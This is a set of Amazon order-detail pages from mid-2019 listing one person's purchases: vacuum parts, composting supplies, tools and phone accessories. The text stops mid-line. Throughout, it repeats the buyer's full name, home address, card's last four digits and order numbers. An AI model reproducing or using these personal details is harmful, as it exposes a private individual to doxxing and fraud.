Sold by: (seller profile) | Product question? Ask Seller $39.99 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $39.99 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $39.99 Brian Coady Estimated tax to be collected: $2.401454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$42.39 United States Credit Card transactions Visa ending in 7528: August 15, 2019:$42.39 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-6204365-6826640 Order Placed: August 12, 2019 Amazon.com order number: 114-6204365-6826640 Order Total: $42.39 Shipped on August 13, 2019 Items Ordered Price 1 of: 14.4V 3500mAh Ni-MH Replacement Battery for iRobot Roomba 400 series $39.99 Roomba 400 405 410 415 416 418 4000 4100 4105 4110 4130 4150 4170 4188 4210 4220 4225 4230 4232 4260 4296 Vacuum Cleaner (2-pack) Sold by: Fancy Buying (seller profile) Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Economy Shipping Payment information Payment Method: Item(s) Subtotal: $39.99 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $39.99 Brian Coady Estimated tax to be collected: $2.401454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$42.39 United States Credit Card transactions Visa ending in 7528: August 13, 2019:$42.39 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-5884682-5253819 Order Placed: August 12, 2019 Amazon.com order number: 114-5884682-5253819 Order Total: $10.47 Shipped on August 13, 2019 Items Ordered Price 1 of: Replacement Parts Kit Bristle Brush for iRobot Roomba 600 Series 595 610 614 620 630 650 660 671 680 690 Vacuum(Includes 3 Pack Filter and Side Brush, 1 Pack Bristle Brush and Flexible Beater Brush, Sold by: AIYA US (seller profile) $9.88 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $9.88 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $9.88 Brian Coady Estimated tax to be collected: $0.591454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$10.47 United States Credit Card transactions Visa ending in 7528: August 13, 2019:$10.47 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-0785827-6482650 Order Placed: August 12, 2019 Amazon.com order number: 114-0785827-6482650 Order Total: $81.07 Shipped on August 13, 2019 Items Ordered 1 of: Neato Boundary Markers, 13 Feet, Compatible with all Neato Robot Vacuums Sold by: Amazon.com Services LLC Price $23.20 Condition: New 1 of: I clean Replacement Neato xv-21 Filters, [12PACKS] Filters for Neato XV Series Robot Vacuums,XV Signature Pro Vacuum Cleaner Parts, with A Free Cleaning Brush Sold by: I-clean (seller profile) $13.29 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Shipped on August 14, 2019 Items Ordered 1 of: iRobot Integrated Home Base (Renewed) Sold by: (seller profile) | Product question? Ask Seller Price $39.99 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Print this page for your records. Payment Method: Visa | Last digits: 7528 Item(s) Subtotal: $76.48 Shipping & Handling: $0.00 ---- Billing address Brian Coady 1454 MONROE ST NW Total before tax: $76.48 Estimated tax to be collected: $4.59 ---- WASHINGTON, DC 20010-3139 Grand Total:$81.07 United States Credit Card transactions Visa ending in 7528: August 14, 2019:$81.07 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-8951419-9622624 Order Placed: August 12, 2019 Amazon.com order number: 114-8951419-9622624 Order Total: $34.97 Shipped on August 14, 2019 Items Ordered Price 1 of: VIVOHOME 110V 950GPH 32W 6 Outlets Electromagnetic Commercial Air Pump for Aquarium Fish Tank and Hydroponic Systems Sold by: VIVOHOME (seller profile) | Product question? Ask Seller $32.99 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $32.99 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $32.99Brian Coady Estimated tax to be collected: $1.981454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$34.97 United States Credit Card transactions Visa ending in 7528: August 14, 2019:$34.97 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-7751295-0248234 Order Placed: August 12, 2019 Amazon.com order number: 114-7751295-0248234 Order Total: $174.90 Shipped on August 12, 2019 Items Ordered Price 1 of: LarvaeLab Black Soldier Fly Composting Bin $165.00 Sold by: VermiTek (seller profile) Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $165.00 Visa | Last digits: 7528 Shipping & Handling: $0.00 Gift Card Total before tax: $165.00Billing address Estimated tax to be collected: $9.90Brian Coady 1454 MONROE ST NW Grand Total:$174.90 WASHINGTON, DC 20010-3139 United States Credit Card transactions Visa ending in 7528: August 12, 2019:$174.90 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-7121276-6841837 Order Placed: August 12, 2019 Amazon.com order number: 114-7121276-6841837 Order Total: $0.00 Shipped on August 13, 2019 Items Ordered Price 1 of: Josh's Frogs Black Soldier Fly Larvae (250 Count -Small) $9.99 Sold by: Josh's Frogs (seller profile) Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Expedited Shipping Payment information Payment Method: Item(s) Subtotal: $9.99 Visa | Last digits: 7528 Shipping & Handling: $0.00 Gift Card Total before tax: $9.99Billing address Estimated tax to be collected: $0.60Brian Coady Gift Card Amount:-$10.59 1454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total: $0.00United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-0609398-5619440 Order Placed: August 12, 2019 Amazon.com order number: 114-0609398-5619440 Order Total: $1.58 Shipped on August 14, 2019 Items Ordered 1 of: CRL Professional Glass Cutter Oil -4 Ounce Sold by: Amazon.com Services LLC Price $8.28 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on August 14, 2019 Items Ordered Price 1 of: Diamond Glass Drill Bit for dremel, Ceramic Tile Drill Bit, Porcelain Tile Drill Bit, $21.99 Diamond Hole Saw Set Drill Bits for Dremel Rotary Tool for Glass, Ceramic, Stone, Bottle, Electric Drill Sold by: Rtreehouse (seller profile) | Product question? Ask Seller Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $30.27 Visa | Last digits: 7528 Shipping & Handling: $0.00 Gift Card ---- Total before tax: $30.27 Billing address Estimated tax to be collected: $1.82 Brian Coady Gift Card Amount:-$30.51 1454 MONROE ST NW ---- WASHINGTON, DC 20010-3139 United States Grand Total: $1.58 Credit Card transactions Visa ending in 7528: August 14, 2019:$1.58 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #114-1431413-1023408 Order Placed: August 12, 2019 Amazon.com order number: 114-1431413-1023408 Order Total: $0.00 Shipped on August 13, 2019 Items Ordered Price 1 of: Nurse Hatty -Ketone Strips -Made in U.S.A. -High Performance Keto Test Strips $6.95 Perfect for Ketogenic, Low Carb, Atkins & Paleo Diets + Free 38pg. eB Sold by: Hatty.Inc (seller profile) FSA or HSA eligible Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $6.95 Visa | Last digits: 7528 Shipping & Handling: $0.00 Gift Card Total before tax: $6.95Billing address Estimated tax to be collected: $0.42Brian Coady Gift Card Amount:-$7.37 1454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total: $0.00 United States FSA or HSA eligible FSA or HSA eligible amount (includes taxes & shipping): $7.37 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-0138473-9139455 Order Placed: August 12, 2019 Amazon.com order number: 114-0138473-9139455 Order Total: $0.00 Shipped on August 12, 2019 Items Ordered Price 1 of: Utopia Kitchen Stainless Steel Compost Bin for Kitchen Countertop -1.3 Gallon Compost Bucket Kitchen Pail Compost with Lid -Includes 1 Spare Charcoa Sold by: Utopia Deals (seller profile) | Product question? Ask Seller $19.99 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $19.99 Visa | Last digits: 7528 Shipping & Handling: $0.00 Gift Card Total before tax: $19.99Billing address Estimated tax to be collected: $1.20Brian Coady Gift Card Amount:-$21.19 1454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total: $0.00United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-7591821-1665024 Order Placed: August 12, 2019 Amazon.com order number: 114-7591821-1665024 Order Total: $0.00 Shipped on August 14, 2019 Items Ordered Price 1 of: Quakehold! 44111 13-Ounce Museum Wax Sold by: Amazon.com Services LLC $11.99 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $11.99 Visa | Last digits: 7528 Shipping & Handling: $0.00 Gift Card Total before tax: $11.99Billing address Estimated tax to be collected: $0.72Brian Coady Gift Card Amount:-$12.71 1454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total: $0.00United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-4425884-5586668 Order Placed: August 12, 2019 Amazon.com order number: 114-4425884-5586668 Order Total: $0.00 Shipped on August 12, 2019 Items Ordered Price 1 of: Tombow Xtreme Removable Indoor/Outdoor Mounting Putty, 60 Pieces (62133) $5.78 Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Shipped on August 12, 2019 Items Ordered Price 1 of: Evapo-Rust, The Original Super Safe Rust Remover, Water-based, Non-Toxic, $7.02 Biodegradable, 32 oz Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $12.80 Visa | Last digits: 7528 Shipping & Handling: $0.00 Gift Card ---- Total before tax: $12.80 Billing address Estimated tax to be collected: $0.77 Brian Coady Gift Card Amount:-$13.57 1454 MONROE ST NW ---- WASHINGTON, DC 20010-3139 Grand Total: $0.00 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #111-5927781-3749020 Order Placed: August 6, 2019 Amazon.com order number: 111-5927781-3749020 Order Total: $29.66 Shipped on August 6, 2019 Items Ordered Price 1 of: MulWark 20pc 1/4 Ultra Low Profile Mini Ratchet Wrench Close Quarters Screwdriver Set with High Torque -Right Angle EDC Tool with 90 Degree Mini Offset Reversible Drive Handle & Multi Hex Bits Set Sold by: Mulwark (seller profile) $16.99 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Shipped on August 6, 2019 Items Ordered Price 1 of: DGOL 12 in 1 Multifunctional Mini Portable Screwdriver Ratchet Wrench Kit $10.99 Sold by: DGOL (seller profile) Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $27.98 Visa | Last digits: 7528 Shipping & Handling: $0.00 ---- Billing address Total before tax: $27.98 Brian Coady Estimated tax to be collected: $1.68 1454 MONROE ST NW ---- WASHINGTON, DC 20010-3139 Grand Total:$29.66 United States Credit Card transactions Visa ending in 7528: August 6, 2019:$11.65 Visa ending in 7528: August 6, 2019:$18.01 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-7305486-3286634 Subscribe and Save Order Placed: August 3, 2019 Amazon.com order number: 111-7305486-3286634 Order Total: $10.04 This order contains Subscribe & Save items. Shipped on August 4, 2019 Items Ordered Price 1 of: Lysol Laundry Sanitizer Additive, Crisp Linen, 90oz Sold by: Amazon.com Services LLC $9.97 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $9.97 Visa | Last digits: 7528 Shipping & Handling: $0.00 Subscribe & Save: -$0.50 Billing address Brian Coady Total before tax: $9.471454 MONROE ST NW Estimated tax to be collected: $0.57WASHINGTON, DC 20010-3139 United States Grand Total:$10.04 Credit Card transactions Visa ending in 7528: August 4, 2019:$10.04 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-9234764-6779467 Order Placed: August 3, 2019 Amazon.com order number: 111-9234764-6779467 Order Total: $7.41 Shipped on August 8, 2019 Items Ordered Price 1 of: Cocomii Ultimate Armor iPhone SE/5S/5 Case New [Heavy Duty] Premium Tactical $6.99 Leather Pattern Grip Slim Fit Shockproof Bumper [Military Defender] Full Body Cover for Apple iPhone SE/5S/5 (Ul.Black) Sold by: Cocomii (seller profile) | Product question? Ask Seller Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Amazon Day Delivery Payment information Payment Method: Item(s) Subtotal: $6.99 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $6.99 Brian Coady Estimated tax to be collected: $0.42 1454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$7.41 United States Credit Card transactions Visa ending in 7528: August 8, 2019:$7.41 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-8907193-9233862 Order Placed: August 3, 2019 Amazon.com order number: 111-8907193-9233862 Order Total: $58.29 Shipped on August 5, 2019 Items Ordered Price 1 of: DistinctInk Case for iPhone 5 / 5S / SE -OtterBox Commuter Black Custom Case $54.99 -Washington DC Flag -US State Flag Sold by: DistinctInk (seller profile) Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $54.99 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $54.99Brian Coady Estimated tax to be collected: $3.301454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$58.29 United States Credit Card transactions Visa ending in 7528: August 5, 2019:$58.29 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-5072991-4894626 Order Placed: August 2, 2019 Amazon.com order number: 111-5072991-4894626 Order Total: $24.03 Shipped on August 3, 2019 Items Ordered Price 1 of: Waterfly Fanny Pack Slim Soft Polyester Water Resistant Waist Bag Pack for Man Women Carrying iPhone 8 Samsung S6 Sold by: Waterfly Direct (seller profile) | Product question? Ask Seller $14.99 Condition: New 1 of: BSLINO 2 Sets/4pcs Sheet Bed Suspenders Adjustable Crisscross Fitted Sheet Band Straps Grippers Adjustable Mattress Pad Duvet Cover Sheet Corner Holder Elastic Fasteners Clips Clippers Sold by: ZGB Shop (seller profile) $14.99 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $29.98 Visa | Last digits: 7528 Shipping & Handling: $0.00 Lightning Deal: -$7.31 Billing address Brian Coady Total before tax: $22.67 1454 MONROE ST NW Estimated tax to be collected: $1.36 WASHINGTON, DC 20010-3139 United States Grand Total:$24.03 Credit Card transactions Visa ending in 7528: August 3, 2019:$24.03 Final Details for Order #111-6982915-6798649 Order Placed: August 2, 2019 Amazon.com order number: 111-6982915-6798649 Order Total: $10.59 Shipped on August 3, 2019 Items Ordered Price 1 of: Screwdriver Set 43 in 1 Precision Screwdriver Kit JAKEMY Magnetic Replaceable Bits Repair Tool Kit Opening Tool and Tweezer for iPhone Cellphone PC El Sold by: JAKEMY (seller profile) $9.99 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $9.99 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $9.99Brian Coady Estimated tax to be collected: $0.601454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$10.59 United States Credit Card transactions Visa ending in 7528: August 3, 2019:$10.59 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-8122703-8875433 Order Placed: August 2, 2019 Amazon.com order number: 111-8122703-8875433 Order Total: $7.41 Shipped on August 3, 2019 Items Ordered Price 1 of: USB 3.0 Micro Cable, JSAUX 2 Pack (3.3ft+6.6ft) USB 3.0 A to Micro B Cable Charger Nylon Braided Cord Compatible with Samsung Galaxy S5, Note 3, Note Pro 12.2, Hard Drive, Camera etc. (Grey) Sold by: JS Digital (seller profile) $11.99 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal:$11.99 Visa | Last digits: 7528 Shipping & Handling: $0.00 Lightning Deal: -$5.00 Billing address Brian Coady Total before tax: $6.991454 MONROE ST NW Estimated tax to be collected: $0.42WASHINGTON, DC 20010-3139 United States Grand Total: $7.41 Credit Card transactions Visa ending in 7528: August 3, 2019:$7.41 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-7210935-3089837 Order Placed: August 1, 2019 Amazon.com order number: 111-7210935-3089837 Order Total: $30.92 Shipped on August 2, 2019 Items Ordered Price 1 of: Zenith Industries ZN502655 Pistol Grip XL Dual Pivot 45-degree Needle Nose Pliers Sold by: Amazon.com Services LLC $14.68 Condition: New 1 of: Zenith Industries ZN502658 Long Reach XL Pivot Ring Nose Pliers, 3/4" Sold by: Amazon.com Services LLC $14.49 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $29.17 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $29.17Brian Coady Estimated tax to be collected: $1.751454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$30.92 United States Credit Card transactions Visa ending in 7528: August 2, 2019:$30.92 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-7039372-4197059 Order Placed: August 1, 2019 Amazon.com order number: 111-7039372-4197059 Order Total: $15.89 Shipped on August 4, 2019 Items Ordered Price 1 of: SPEEDWOX 13 Inches Long Reach Pliers Flat Nose Pliers Fine Duck Bill Pliers $14.99 Machined Jaws Dual Pivot Double X Extra Long for Hard to Reach Narrow Spaces High Leverage Professional Tool Sold by: SPEEDWOX (seller profile) Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: No-Rush Shipping Payment information Payment Method: Item(s) Subtotal: $14.99 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $14.99 Brian Coady Estimated tax to be collected: $0.901454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$15.89 United States Credit Card transactions Visa ending in 7528: August 4, 2019:$15.89 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-1003497-5516237 Order Placed: August 1, 2019 Amazon.com order number: 111-1003497-5516237 Order Total: $10.59 Shipped on August 2, 2019 Items Ordered Price 1 of: 30pack Colored Nylon Coated Stainless Steel Wire Keychains 2mm 4/6.3/7.9 inches Aircraft Cable Key Ring Loops for Hanging Luggage Tags or ID Tags Sold by: Millennial Essentials (seller profile) $9.99 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $9.99 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $9.99Brian Coady Estimated tax to be collected: $0.601454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$10.59 United States Credit Card transactions Visa ending in 7528: August 2, 2019:$10.59 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-7389124-1817062 Order Placed: July 29, 2019 Amazon.com order number: 111-7389124-1817062 Order Total: $17.99 Shipped on July 30, 2019 Items Ordered Price 1 of: SharkBite 25088 Bagged Toilet Kit, 1/4 in Sold by: Amazon.com Services LLC $16.97 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $16.97 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $16.97 Brian Coady Estimated tax to be collected: $1.021454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$17.99 United States Credit Card transactions Visa ending in 7528: July 30, 2019:$17.99 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-4144242-0049061 Order Placed: July 29, 2019 Amazon.com order number: 111-4144242-0049061 Order Total: $23.36 Shipped on July 30, 2019 Items Ordered Price 1 of: Clover Mini Iron II -The Adapter (9100) Sold by: treasuresandmemories7 (seller profile) $22.04 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $22.04 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $22.04 Brian Coady Estimated tax to be collected: $1.321454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$23.36 United States Credit Card transactions Visa ending in 7528: July 30, 2019:$23.36 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-0942527-7305022 Order Placed: July 27, 2019 Amazon.com order number: 111-0942527-7305022 Order Total: $31.88 Shipped on July 28, 2019 Items Ordered Price 1 of: Leviton AGTR2-W SmartlockPro Dual Function AFCI/GFCI Receptacle, 20 Amp/125V, White Sold by: Amazon.com Services LLC $30.08 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $30.08 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $30.08Brian Coady Estimated tax to be collected: $1.801454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$31.88 United States Credit Card transactions Visa ending in 7528: July 28, 2019:$31.88 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-6154478-0500213 Order Placed: July 27, 2019 Amazon.com order number: 111-6154478-0500213 Order Total: $25.43 Shipped on July 28, 2019 Items Ordered Price 1 of: Aria life Clothes and Pantry Moth Traps 3+3 Pack with Twice Stronger Pheromone $23.99 Attractant | Heavy Duty Glue, Safe, Non-Toxic with No Insecticides or O Sold by: Aria Life (seller profile) Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $23.99 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $23.99Brian Coady Estimated tax to be collected: $1.441454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$25.43 United States Credit Card transactions Visa ending in 7528: July 28, 2019:$25.43 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-8003310-4113008 Order Placed: July 27, 2019 Amazon.com order number: 111-8003310-4113008 Order Total: $3.61 Shipped on July 28, 2019 Items Ordered Price 1 of: AG13/LR44 Alkaline Button Cell Battery -20 pack Sold by: SolomonSupply (seller profile) | Product question? Ask Seller $3.41 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $3.41 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $3.41 Brian Coady Estimated tax to be collected: $0.20 1454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$3.61 United States Credit Card transactions Visa ending in 7528: July 28, 2019:$3.61 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-9804457-0217030 Order Placed: July 27, 2019 Amazon.com order number: 111-9804457-0217030 Order Total: $84.64 Shipped on July 29, 2019 Items Ordered Price 1 of: FLEXiT Solar-500 Lumen LED Solar and USB-Rechargeable Flexible Flashlight Sold by: Amazon.com Services LLC $49.99 Condition: New 5 of: Striker 00105 Magnetic Light Mine Hands-Free Flashlight Sold by: Amazon.com Services LLC $5.97 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $79.84 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $79.84 Brian Coady Estimated tax to be collected: $4.801454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$84.64 United States Credit Card transactions Visa ending in 7528: July 29, 2019:$84.64 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-1696704-8543453 Order Placed: July 25, 2019 Amazon.com order number: 111-1696704-8543453 Order Total: $33.92 Shipped on July 26, 2019 Items Ordered Price 1 of: ToughBuilt TB-KP-3 Thigh Support Stabilization Knee Pads Sold by: STL PRO, Inc. (seller profile) $34.99 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Economy Shipping Payment information Payment Method: Item(s) Subtotal: $34.99 Visa | Last digits: 7528 Shipping & Handling: $0.00 Amazon Discount: -$2.99 Billing address Brian Coady Total before tax: $32.001454 MONROE ST NW Estimated tax to be collected: $1.92WASHINGTON, DC 20010-3139 United States Grand Total:$33.92 Credit Card transactions Visa ending in 7528: July 26, 2019:$33.92 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-4065831-6285813 Order Placed: July 23, 2019 Amazon.com order number: 111-4065831-6285813 Order Total: $8.47 Shipped on July 24, 2019 Items Ordered Price 1 of: Cell Phone Stick on Wallet Card Holder,3 Pack Universal ID Credit Card Wallet Pocket Pouch Cash Slot,3M Adhesive Slim Sticker for Android,iPhone,Smart Phone,Black,Gray,Pink Sold by: Cookhoo (seller profile) $7.99 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $7.99 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $7.99 Brian Coady Estimated tax to be collected: $0.48 1454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$8.47 United States Credit Card transactions Visa ending in 7528: July 24, 2019:$8.47 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-2155880-2301005 Order Placed: July 23, 2019 Amazon.com order number: 111-2155880-2301005 Order Total: $26.49 Shipped on July 25, 2019 Items Ordered Price 1 of: Catalyst Airpods Case Protective Silicon Cover, Compatible with Airpods Charging $24.99 Case for Airpods 2, LED light visible, compatible with Wireless Charging, Carabiner, Waterproof -Slate Gray Sold by: Catalyst® (seller profile) Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Amazon Day Delivery Payment information Payment Method: Item(s) Subtotal: $24.99 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $24.99 Brian Coady Estimated tax to be collected: $1.501454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$26.49 United States Credit Card transactions Visa ending in 